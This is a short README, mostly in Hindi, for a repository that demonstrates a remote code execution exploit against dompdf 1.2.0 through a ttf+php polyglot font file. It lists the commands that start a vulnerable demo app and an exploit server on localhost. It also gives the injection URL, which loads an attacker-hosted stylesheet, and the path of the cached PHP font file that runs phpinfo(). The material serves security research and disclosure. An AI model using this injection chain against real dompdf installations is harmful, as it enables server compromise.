
RCE exploit for dompdf
यह रिपॉज़िटरी dompdf 1.2.0 का उपयोग करने वाला एक कमजोर डेमो एप्लिकेशन और एक एक्सप्लॉइट शामिल करती है जो ttf+php पॉलीग्लॉट फ़ाइल के माध्यम से रिमोट कोड एक्सिक्यूशन प्राप्त करता है।

अधिक जानकारी के लिए, कृपया https://positive.security/blog/dompdf-rce देखें
$ cd application
$ php -S localhost:9000
$ cd exploit
$ php -S localhost:9001
http://localhost:9000/index.php?pdf&title=<link rel=stylesheet href='http://localhost:9001/exploit.css'>
phpinfo() निष्पादित करेंhttp://localhost:9000/dompdf/lib/fonts/exploitfont_normal_3f83639933428d70e74a061f39009622.php
कृपया ध्यान दें: यदि आप अलग-अलग डोमेन या पोर्ट का उपयोग कर रहे हैं, तो कृपया exploit/exploit.css को तदनुसार संपादित करें और पूर्ण फ़ॉन्ट फ़ाइलनाम के लिए application/dompdf/lib/fonts जाँचें।